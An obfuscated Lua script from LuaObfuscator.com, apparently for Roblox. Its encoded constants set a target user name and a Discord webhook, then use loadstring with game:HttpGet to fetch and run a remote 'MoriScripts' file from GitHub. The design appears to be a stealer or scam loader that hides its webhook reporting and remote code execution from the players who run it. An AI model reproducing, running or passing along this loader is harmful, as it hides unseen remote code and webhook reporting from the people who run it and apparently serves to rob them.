--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (v71==0) then v19=v0(v3(v30,1,1));return "";end end else local v72=v2(v0(v30,16));if v19 then local v80=0;local v81;while true do if (v80==0) then v81=v5(v72,v19);v19=nil;v80=1;end if (v80==1) then return v81;end end else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=0 -0 ;local v74;while true do if (v73==(0 -0)) then v74=(v31/((3 -(1 + 0))^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(1 -0)) -(v32-1)) + (932 -(857 + 74)))) ;return v74-(v74%(569 -(367 + 201))) ;end end else local v75=(1992 -(68 + 997)) -(214 + 713) ;local v76;while true do if ((0 + 0)==v75) then v76=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v76 + v76))>=v76) and 1) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==1) then return v35;end if ((0 + 0)==v34) then v35=v1(v16,v18,v18);v18=v18 + ((2228 -(892 + 65)) -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (352 -(87 + 263)) ;v36=181 -(50 + 17 + 113) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v42 * (66680831 -49903615)) + (v41 * (66488 -(802 + (403 -253)))) + (v40 * (464 -208)) + v39 ;end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==1) then v46=1 + 0 ;v47=(v20(v45,1,1017 -(915 + 82) ) * ((5 -3)^32)) + v44 ;v43=2 + 0 ;end if (v43==3) then if (v48==(0 -(1138 -(116 + 1022)))) then if (v47==(1187 -(1069 + 118))) then return v49 * (0 -0) ;else local v99=0;while true do if (v99==(0 -(0 -0))) then v48=1 + 0 ;v46=0 -0 ;break;end end end elseif (v48==(1193 + 838 + 16)) then return ((v47==(791 -(368 + 423))) and (v49 * (1/(0 -(0 -0))))) or (v49 * NaN) ;end return v8(v49,v48-(1041 -(10 + 8)) ) * (v46 + (v47/((7 -5)^((1754 -1260) -((1275 -(814 + 45)) + 26))))) ;end if (v43==0) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(1 + 1)) then v48=v20(v45,36 -15 ,469 -(145 + 293) );v49=((v20(v45,462 -(44 + (950 -564)) )==(1487 -(998 + 488))) and  -(1 + 0)) or (1 + 0) ;v43=775 -(201 + 571) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v67=1 + 0 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v69=578 -(386 + 192) ;local v70;while true do if (v69==(1206 -(696 + 510))) then v70=0 -0 ;while true do if (0==v70) then if (v53~=(1265 -(1091 + 171))) then else local v104=0;while true do if (v104==(0 + 0)) then for v120=1,v23() do v55[v120-(3 -2) ]=v28();end return v57;end end end if (0==v53) then local v105=0;local v106;while true do if (v105~=(0 -0)) then else v106=0;while true do if (v106==1) then v56={};v53=1;break;end if (0~=v106) then else v54={};v55={};v106=375 -(123 + 251) ;end end break;end end end v70=4 -3 ;end if (v70==1) then if (v53==2) then for v109=1,v58 do local v110=698 -(208 + 490) ;local v111;local v112;local v113;while true do if (v110==(0 + 0)) then v111=0 + 0 ;v112=nil;v110=1;end if (v110==1) then v113=nil;while true do if (v111~=(836 -(660 + 176))) then else local v164=0 + 0 ;local v165;while true do if (v164~=(202 -(14 + 188))) then else v165=675 -(534 + 141) ;while true do if (v165==0) then local v181=0 + 0 ;while true do if (v181~=1) then else v165=1 + 0 ;break;end if ((0 + 0)==v181) then v112=v21();v113=nil;v181=1 -0 ;end end end if (v165==(1 -0)) then v111=1;break;end end break;end end end if (1~=v111) then else if (v112==(2 -1)) then v113=v21()~=(0 + 0) ;elseif (v112==(2 + 0)) then v113=v24();elseif (v112==(399 -(115 + 281))) then v113=v25();end v59[v109]=v113;break;end end break;end end end v57[6 -3 ]=v21();for v114=1,v23() do local v115=0 + 0 ;local v116;local v117;local v118;while true do if (v115==(0 -0)) then v116=0;v117=nil;v115=3 -2 ;end if (v115~=(868 -(550 + 317))) then else v118=nil;while true do if ((0 -0)==v116) then local v167=0;while true do if ((1 -0)==v167) then v116=2 -1 ;break;end if (0==v167) then v117=285 -(134 + 151) ;v118=nil;v167=1;end end end if (v116~=(1666 -(970 + 695))) then else while true do if (v117==0) then v118=v21();if (v20(v118,1 -0 ,1)==0) then local v177=0;local v178;local v179;local v180;while true do if (v177==(1990 -(582 + 1408))) then v178=v20(v118,6 -4 ,3 -0 );v179=v20(v118,15 -11 ,6);v177=1;end if (v177==1) then v180={v22(),v22(),nil,nil};if (v178==0) then local v184=0;local v185;local v186;while true do if (v184==0) then v185=780 -(162 + 618) ;v186=nil;v184=1 + 0 ;end if (v184~=(1 + 0)) then else while true do if (v185==(0 -0)) then v186=0 -0 ;while true do if (0==v186) then v180[3]=v22();v180[4]=v22();break;end end break;end end break;end end elseif (v178==1) then v180[1 + 2 ]=v23();elseif (v178==2) then v180[1639 -(1373 + 263) ]=v23() -((1002 -(451 + 549))^16) ;elseif (v178==3) then local v195=0;while true do if (v195~=(0 + 0)) then else v180[4 -1 ]=v23() -(2^16) ;v180[6 -2 ]=v22();break;end end end v177=2;end if (v177~=2) then else local v182=0;while true do if (v182==1) then v177=1387 -(746 + 638) ;break;end if (v182==0) then if (v20(v179,1 + 0 ,1 -0 )~=1) then else v180[343 -(218 + 123) ]=v59[v180[1583 -(1535 + 46) ]];end if (v20(v179,2 + 0 ,1 + 1 )~=(561 -(306 + 254))) then else v180[1 + 2 ]=v59[v180[5 -2 ]];end v182=1468 -(899 + 568) ;end end end if (v177==3) then if (v20(v179,2 + 1 ,3)==(2 -1)) then v180[4]=v59[v180[607 -(268 + 335) ]];end v54[v114]=v180;break;end end end break;end end break;end end break;end end end v53=3;end if (v53~=(291 -(60 + 230))) then else local v108=0;while true do if (v108==(572 -(426 + 146))) then local v119=0;while true do if (v119==1) then v108=1;break;end if (v119~=0) then else v57={v54,v55,nil,v56};v58=v23();v119=812 -(569 + 242) ;end end end if ((2 -1)==v108) then v59={};v53=1 + 1 ;break;end end end break;end end break;end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v82=v64;local v83=v65;local v84=v66;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=9) then if (v95<=4) then if (v95<=1) then if (v95>0) then local v122=v94[2];v92[v122]=v92[v122](v13(v92,v122 + 1 ,v87));else local v124=v94[2];local v125,v126=v85(v92[v124](v13(v92,v124 + 1 ,v94[3])));v87=(v126 + v124) -1 ;local v127=0;for v143=v124,v87 do v127=v127 + 1 ;v92[v143]=v125[v127];end end elseif (v95<=2) then do return;end elseif (v95>3) then v92[v94[2]]=v94[3];else v92[v94[2]]=v62[v94[3]];end elseif (v95<=6) then if (v95==5) then v92[v94[2]]();else local v128=v94[2];local v129=v92[v94[3]];v92[v128 + 1 ]=v129;v92[v128]=v129[v94[4]];end elseif (v95<=7) then v92[v94[2]]=v94[3];elseif (v95>8) then v92[v94[2]]=v62[v94[3]];else v62[v94[3]]=v92[v94[2]];end elseif (v95<=14) then if (v95<=11) then if (v95==10) then v92[v94[2]][v94[3]]=v94[4];else v62[v94[3]]=v92[v94[2]];end elseif (v95<=12) then v92[v94[2]]();elseif (v95>13) then v92[v94[2]]=v94[3]~=0 ;else local v155=v94[2];v92[v155]=v92[v155](v13(v92,v155 + 1 ,v87));end elseif (v95<=16) then if (v95==15) then do return;end else v92[v94[2]]=v94[3]~=0 ;end elseif (v95<=17) then local v140=0;local v141;local v142;while true do if (v140==1) then v92[v141 + 1 ]=v142;v92[v141]=v142[v94[4]];break;end if (v140==0) then v141=v94[2];v142=v92[v94[3]];v140=1;end end elseif (v95>18) then v92[v94[2]][v94[3]]=v94[4];else local v159=0;local v160;local v161;local v162;local v163;while true do if (v159==2) then for v174=v160,v87 do v163=v163 + 1 ;v92[v174]=v161[v163];end break;end if (v159==0) then v160=v94[2];v161,v162=v85(v92[v160](v13(v92,v160 + 1 ,v94[3])));v159=1;end if (v159==1) then v87=(v162 + v160) -1 ;v163=0;v159=2;end end end v86=v86 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503083O00395348574957484503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130372O323432303736323639343234382O322F7938774E5A6E6843796B64416542506974486B6C7331556E412D61646E6D32656645544C4B4F4A62694B3870504E58465A6663476D6B492D475131795A56476F2O32367403093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O0012043O00023O00120B3O00013O0012043O00043O00120B3O00033O0012043O00023O00120B3O00053O0012093O00063O00300A3O000700080012093O00063O00300A3O000900080012093O00063O00300A3O000A00080012093O000B3O0012090001000C3O00201100010001000D0012040003000E4O000E000400016O000100044O000D5O00022O000C3O000100012O000F3O00017O00",v9(),...);
